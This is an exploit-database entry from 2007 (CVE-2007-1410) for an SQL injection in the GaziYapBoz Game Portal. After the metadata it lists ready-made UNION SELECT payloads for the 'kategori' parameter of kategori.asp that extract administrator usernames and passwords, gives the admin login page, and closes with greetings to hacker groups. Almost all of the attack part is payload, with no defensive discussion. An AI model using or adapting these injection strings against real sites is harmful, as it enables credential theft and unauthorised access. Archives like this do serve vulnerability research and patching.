GaziYapBoz Game Portal - 'kategori.asp' SQL Injection
Author: CyberGhost
type: webapps
platform: asp
port:
date_added: 2007-03-07
date_updated: 2016-09-27
verified: 1
codes: OSVDB-35600;CVE-2007-1410
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comgaziyapboz.zip
#Title : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir
Vuln.
Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin
Login : /personelgirisizni.asp
====================================
Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL
And All TURKISH HACKERS
# milw0rm.com [2007-03-08]